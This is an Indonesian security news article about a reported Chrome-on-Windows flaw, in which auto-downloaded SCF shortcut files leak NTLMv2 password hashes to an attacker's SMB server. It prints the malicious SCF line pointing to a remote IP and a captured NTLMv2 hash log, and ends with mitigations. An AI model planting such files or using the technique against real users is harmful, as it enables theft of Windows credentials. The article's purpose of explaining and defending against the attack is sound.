Bahaya! Hacker mampu mencuri password Windows menggunakan Chrome

Seorang peneliti keamanan telah menemukan kerentanan serius dalam konfigurasi default versi terbaru Google Chrome. Versi terbaru Google Chrome yang berjalan pada versi sistem operasi Microsoft Windows, termasuk Windows 10. Memungkinkan hacker mencuri kredensial masuk pengguna. Dengan kata lain, Hacker mampu mencuri password Windows menggunakan Chrome.




Peneliti Bosko Stankovic dari DefenseCode telah menemukan bahwa hanya dengan mengunjungi situs web yang berisi file SCF yang berbahaya. Memungkinkan korban atau pengunjung tidak menyadari berbagi identitas dan log in komputer mereka bisa dicuri oleh hacker. Hacker menggunakan Chrome dan protokol SMB.

Teknik ini bukan hal yang baru dan dimanfaatkan oleh Stuxnet. Stuxnet merupakan sebuah malware hebat yang dirancang khusus untuk menghancurkan program nuklir Iran. Malware ini menggunakan file shortcut berekstensi LNK pada windows.

Apa yang membuat serangan ini berbeda dari yang lain adalah kenyataan bahwa serangan terkait otentikasi SMB. Hacker mampu mencuri password Windows menggunakan Chrome. Hal semacam ini telah ditunjukkan pertama kali di Google Chrome secara publik, setelah Internet Explorer (IE) dan Microsoft Edge.

Chrome + SCF + SMB = Mencuri Kredensial Windows

Format file shortcut SCF (Shell Command File) bekerja serupa dengan file LNK dan dirancang untuk mendukung serangkaian perintah Windows Explorer. Yang membantu menentukan ikon padadesktop, seperti My Computer and Recycle Bin.

“Saat ini, penyerang hanya perlu menarik perhatian korban (menggunakan Google Chrome dan Windows yang telah diperbarui sepenuhnya) untuk mengunjungi situs webnya agar dapat melanjutkan dan menggunakan kembali kredensial otentikasi korban,” tulis Stankovic dalam sebuah posting blog, yang menjelaskan kekurangannya.

Pada dasarnya, shortcut link pada desktop adalah file teks dengan sintaks khusus dari kode shell yang mendefinisikan lokasi ikon / thumbnail, nama aplikasi dan lokasinya.

errorcybernews.com

Shell

[Shell] Command=2 IconFile=explorer.exe,3

1 2 3

[Shell] Command=2 IconFile=explorer.exe,3

Karena Chrome mempercayai file Windows SCF, maka attacker dapat menipu korban untuk mengunjungi situs web mereka. web tersebut berisi file shortcut yang dibuat dengan sengaja, yang akan didownload secara otomatis ke sistem target tanpa meminta konfirmasi dari pengguna.

Begitu pengguna membuka folder yang berisi file yang diunduh tersebut. maka Cepat atau lambat, file ini berjalan secara otomatis untuk mengambil ikon tanpa pengguna harus mengkliknya.

Tapi alih-alih menyetel lokasi gambar ikon, file SCF berbahaya yang dibuat oleh attacker ini berisi lokasi server SMB jarak jauh (dikendalikan oleh attacker).

errorcybernews.com

Shell

[Shell] IconFile=\\170.170.170.170\icon

1 2	[Shell] IconFile=\\170.170.170.170\icon

Jadi, segera setelah file SCF mencoba untuk mengambil gambar ikon, ia akan mengelabui pembuatan autentikasi otomatis dengan server jarak jauh. Server ini dikontrol penyerang melalui protokol SMB, menyerahkan nama pengguna dan versi hash password. Hacker mampu mencuri password Windows menggunakan Chrome. Hal ini memungkinkan hacker untuk melakukan otentikasi ke komputer pribadi atau sumber jaringan Kita.

“Menetapkan lokasi ikon ke server SMB jarak jauh adalah vektor serangan yang diketahui telah menyalahgunakan fitur otentikasi otomatis Windows saat mengakses layanan seperti file file jarak jauh,” kata Stankovic.

Tapi setelah serangan Stuxnet, Microsoft memaksa file LNK memuat ikon mereka hanya dari sumber daya lokal sehingga mereka tidak lagi rentan terhadap serangan semacam itu yang membuat mereka memuat kode berbahaya dari server luar.

Namun, file SCF tetap dibiarkan apa adanya.

Mengeksploitasi LM / NTLM Hash Authentication via SCF File

Tapi mengapa PC Windows Kita secara otomatis menyerahkan kredensial Kita ke server?
Jika Kita tidak sadar, ini adalah cara otentikasi melalui protokol Server Message Block (SMB). Protokol ini bekerja dengan mekanisme otentikasi challenge / response NTLM.
Singkatnya, otentikasi LM / NTLM bekerja dalam 4 langkah:

• Pengguna Windows (klien) mencoba masuk ke server.
• Server merespons dengan challenge value, meminta pengguna untuk mengenkripsi challenge value dengan hash passwordnya dan mengirimkannya kembali.
• Windows menangani permintaan SCF dengan mengirimkan nama pengguna dan versi hash dari password ke server.
• Server kemudian menangkap respons tersebut dan menyetujui otentikasi, jika password hash klien benar.

Nah, dalam skenario serangan SCF, yang dijabarkan oleh Stankovic. Windows akan mencoba untuk melakukan otentikasi ke server SMB berbahaya secara otomatis dengan memberikan username korban dan hash password NTLMv2. Dari komputer pribadi atau sumber jaringan ke server, seperti yang dijelaskan di atas pada Langkah 3.
Jika pengguna adalah bagian dari jaringan perusahaan, kredensial jaringan yang diberikan kepada pengguna oleh sysadmin perusahaannya akan dikirim ke attacker.
Jika korban adalah pengguna rumahan, username dan password Windows korban akan dikirim ke attacker.

errorcybernews.com

[*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000 00000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

1 2 3 4 5 6 7 8 9 10

[*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000 00000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

Tidak diragukan lagi, bahwa kredensial yang dienkripsi tapi tetap bisa “di brute force” untuk mengambil password login asli dalam teks biasa.

“Perlu disebutkan bahwa file SCF akan muncul tanpa ekstensi di Windows Explorer terlepas dari pengaturan file dan folder,” kata peneliti tersebut. “Karena itu, file bernama picture.jpg.scf akan muncul di Windows Explorer sebagai picture.jpg. Ini menambah sifat serangan yang tidak mencolok dengan menggunakan file SCF.”

Cara Mencegah Serangan yang Terkait dengan Otentikasi SMB semacam itu

Cukup, blok koneksi outbound SMB (port TCP 139 dan 445) dari jaringan lokal ke WAN melalui firewall, sehingga komputer lokal tidak dapat melakukan query server SMB jauh.
Stankovic juga menyarankan pengguna untuk mempertimbangkan untuk menonaktifkan unduhan otomatis di Google Chrome dengan membuka Settings → Show advanced settings → and then Check the “Ask where to save each file before downloading”.

Perubahan ini akan memungkinkan Kita menyetujui setiap upaya unduhan secara manual, yang secara signifikan akan mengurangi risiko serangan pencurian kredensial menggunakan file SCF.
Google menyadari kerentanan tersebut dan sedang membuat patch nya, namun belum dipastikan kapan patch tersebut akan tersedia bagi pengguna.

• 
  

Share this post

-->